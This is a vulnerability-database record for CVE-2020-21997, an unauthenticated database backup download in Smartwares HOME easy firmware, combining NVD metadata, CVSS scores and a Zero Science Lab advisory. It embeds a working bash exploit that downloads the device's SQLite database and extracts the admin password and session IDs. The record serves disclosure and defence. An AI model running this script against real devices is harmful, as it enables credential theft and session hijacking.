Description
Smartwares HOME easy <=1.0.9 is vulnerable to an unauthenticated database backup download and information disclosure vulnerability. An attacker could disclose sensitive and clear-text information resulting in authentication bypass, session hijacking and full system control.
Affected Software
Related
{"id": "CVE-2020-21997", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2020-21997", "description": "Smartwares HOME easy <=1.0.9 is vulnerable to an unauthenticated database backup download and information disclosure vulnerability. An attacker could disclose sensitive and clear-text information resulting in authentication bypass, session hijacking and full system control.", "published": "2021-04-29T15:15:00", "modified": "2021-05-05T20:35:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0}, "severity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-21997", "reporter": "cve@mitre.org", "references": ["https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5541.php", "https://www.exploit-db.com/exploits/47596"], "cvelist": ["CVE-2020-21997"], "immutableFields": [], "lastseen": "2022-03-23T15:09:10", "viewCount": 11, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:47596"]}, {"type": "zeroscience", "idList": ["ZSL-2019-5541"]}], "rev": 4}, "score": {"value": 2.9, "vector": "NONE"}, "twitter": {"counter": 5, "tweets": [{"link": "https://twitter.com/www_sesin_at/status/1390068867762991104", "text": "New post from https://t.co/9KYxtdZjkl?amp=1 (CVE-2020-21997 (home_easy_firmware)) has been published on https://t.co/JdwVSNm7QZ?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1390048760814780418", "text": " NEW: CVE-2020-21997 Smartwares HOME easy <=1.0.9 is vulnerable to an unauthenticated database backup download and information disclosure vulnerability. An attacker could disclose sensitive and clear-text inform... (click for more) Severity: HIGH https://t.co/1BkpoBuH36?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1390048760814780418", "text": " NEW: CVE-2020-21997 Smartwares HOME easy <=1.0.9 is vulnerable to an unauthenticated database backup download and information disclosure vulnerability. An attacker could disclose sensitive and clear-text inform... (click for more) Severity: HIGH https://t.co/1BkpoBuH36?amp=1"}, {"link": "https://twitter.com/WolfgangSesin/status/1390068878399709185", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2020-21997 (home_easy_firmware)) has been published on https://t.co/M62r9poKhy?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1390229955414568961", "text": " NEW: CVE-2020-21997 Smartwares HOME easy <=1.0.9 is vulnerable to an unauthenticated database backup download and information disclosure vulnerability. An attacker could disclose sensitive and clear-text inform... (click for more) Severity: HIGH https://t.co/1BkpoBuH36?amp=1"}], "modified": "2021-05-06T08:50:08"}, "backreferences": {"references": [{"type": "zeroscience", "idList": ["ZSL-2019-5541"]}]}, "exploitation": null, "vulnersScore": 2.9}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/o:smartwares:home_easy_firmware:1.0.9"], "cpe23": ["cpe:2.3:o:smartwares:home_easy_firmware:1.0.9:*:*:*:*:*:*:*"], "cwe": ["CWE-200"], "affectedSoftware": [{"cpeName": "smartwares:home_easy_firmware", "version": "1.0.9", "operator": "le", "name": "smartwares home easy firmware"}], "affectedConfiguration": [{"name": "smartwares home easy", "cpeName": "smartwares:home_easy", "version": "-", "operator": "eq"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:smartwares:home_easy_firmware:1.0.9:*:*:*:*:*:*:*", "versionEndIncluding": "1.0.9", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:h:smartwares:home_easy:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}]}, "extraReferences": [{"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5541.php", "name": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5541.php", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/47596", "name": "Exploit Database", "refsource": "EXPLOIT-DB", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}
{"zeroscience": [{"lastseen": "2021-12-12T07:57:30", "description": "Title: Smartwares HOME easy v1.0.9 Database Backup Information Disclosure Exploit \nAdvisory ID: [ZSL-2019-5541](<ZSL-2019-5541.php>) \nType: Local/Remote \nImpact: Exposure of System Information, Exposure of Sensitive Information, Security Bypass \nRisk: (4/5) \nRelease Date: 05.11.2019 \n\n\n##### Summary\n\nHome Easy/Smartwares are a range of products designed to remotely control your home using wireless technology. Home Easy/Smartwares is very simple to set up and allows you to operate your electrical equipment like lighting, appliances, heating etc. \n\n##### Description\n\nThe home automation solution is vulnerable to unauthenticated database backup download and information disclosure vulnerability. This can enable the attacker to disclose sensitive and clear-text information resulting in authentication bypass, session hijacking and full system control. \n\n##### Vendor\n\nSmartwares - <https://www.smartwares.eu>\n\n##### Affected Version\n\n<=1.0.9 \n\n##### Tested On\n\nBoa/0.94.13 \n\n##### Vendor Status\n\n[30.09.2019] Vulnerability discovered. \n[01.10.2019] Vendor contacted. \n[04.11.2019] No response from the vendor. \n[05.11.2019] Public security advisory released. \n\n##### PoC\n\n[homeeasy_backup.sh](<../../codes/homeeasy_backup.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://www.exploit-db.com/exploits/47596> \n[2] <https://exchange.xforce.ibmcloud.com/vulnerabilities/171051> \n[3] <https://packetstormsecurity.com/files/155177> \n[4] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-21997> \n[5] <https://nvd.nist.gov/vuln/detail/CVE-2020-21997>\n\n##### Changelog\n\n[05.11.2019] - Initial release \n[11.11.2019] - Added reference [1], [2] and [3] \n[19.06.2021] - Added reference [4] and [5] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-05T00:00:00", "type": "zeroscience", "title": "Smartwares HOME easy v1.0.9 Database Backup Information Disclosure Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-21997"], "modified": "2019-11-05T00:00:00", "id": "ZSL-2019-5541", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2019-5541.php", "sourceData": "<html><body><p>#!/bin/bash\r\n#\r\n#\r\n# Smartwares HOME easy v1.0.9 Database Backup Information Disclosure Exploit\r\n#\r\n#\r\n# Vendor: Smartwares\r\n# Product web page: https://www.smartwares.eu\r\n# Affected version: <=1.0.9\r\n#\r\n# Summary: Home Easy/Smartwares are a range of products designed to remotely\r\n# control your home using wireless technology. Home Easy/Smartwares is very\r\n# simple to set up and allows you to operate your electrical equipment like\r\n# lighting, appliances, heating etc.\r\n#\r\n# Desc: The home automation solution is vulnerable to unauthenticated database\r\n# backup download and information disclosure vulnerability. This can enable the\r\n# attacker to disclose sensitive and clear-text information resulting in authentication\r\n# bypass, session hijacking and full system control.\r\n#\r\n# ==============================================================================\r\n# root@kali:~/homeeasy# ./he_info.sh http://192.168.1.177:8004\r\n# Target: http://192.168.1.177:8004\r\n# Filename: 192.168.1.177:8004-16072019-db.sqlite\r\n# Username: admin\r\n# Password: s3cr3tP4ssw0rd\r\n# Version: 1.0.9\r\n# Sessions: \r\n# ------------------------------------------------------------------\r\n# * Ft5Mkgr5i9ywVrRH4mAECSaNJkTp5oiC0fpbuIgDIFbE83f3hGGKzIyb3krXHBsy\r\n# * Gcea4Ald4PlVGkOh23mIohGq2Da6h4mX0A8ibkm7by3QSI8TLmuaubrvGABWvWMJ\r\n# * JFU4zpdhuN4RTYgvvAhKQKqnQSvc8MAJ0nMTLYb8F6YzV7WjHe4qYlMH6aSdOlN9\r\n# * VtOqw37a12jPdJH3hJ5E9qrc3I4YY1aU0PmIRkSJecAqMak4TpzTORWIs1zsRInd\r\n# * flR4VjFmDBSiaTmXSYQxf4CdtMT3OQxV0pQ1zwfe98niSI9LIYcO3F2nsUpiDVeH\r\n# * rCfrAvnfnl6BsLjF9FjBoNgPgvqSptcH0i9yMwN3QSDbwNHwu19ROoAVSROamRRk\r\n# ------------------------------------------------------------------\r\n# ==============================================================================\r\n#\r\n# Tested on: Boa/0.94.13\r\n#\r\n#\r\n# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n# Zero Science Lab - https://www.zeroscience.mk\r\n#\r\n#\r\n# Advisory ID: ZSL-2019-5541\r\n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5541.php\r\n#\r\n#\r\n# 30.09.2019\r\n#\r\n#\r\n\r\n\r\nif [ \"$#\" -ne 1 ]; then\r\n echo \"Usage: $0 http://ip:port\"\r\n exit 0\r\nfi\r\nTARGET=$1\r\nCHECK=$(curl -Is $TARGET/data.dat 2>/dev/null | head -1 | awk -F\" \" '{print $2}')\r\nif [[ \"$?\" = \"7\" ]] || [[ $CHECK != \"200\" ]]; then\r\n echo \"No juice.\"\r\n exit 1\r\nfi\r\necho \"Target: \"$TARGET\r\nFNAME=${TARGET:7}-$(date +\"%d%m%Y\")\r\ncurl -s $TARGET/data.dat -o $FNAME-db.sqlite\r\necho \"Filename: $FNAME-db.sqlite\"\r\necho \"Username: \"$(sqlite3 $FNAME-db.sqlite \"select usrname from usr\") # default: admin\r\necho \"Password: \"$(sqlite3 $FNAME-db.sqlite \"select usrpassword from usr\") # default: 111111\r\necho \"Version: \"$(sqlite3 $FNAME-db.sqlite \"select option_value1 from option LIMIT 1 OFFSET 3\")\r\necho -ne \"Sessions: \\n\"\r\nprintf \"%0.s-\" {1..66}\r\nprintf \"\\n\"\r\nsqlite3 $FNAME-db.sqlite \"select sessionid from sessiontable\" | xargs -L1 echo \"*\"\r\nprintf \"%0.s-\" {1..66} ; printf \"\\n\\n\"\r\n</p></body></html>", "sourceHref": "http://zeroscience.mk/codes/homeeasy_backup.txt", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}
CVE-2020-21997
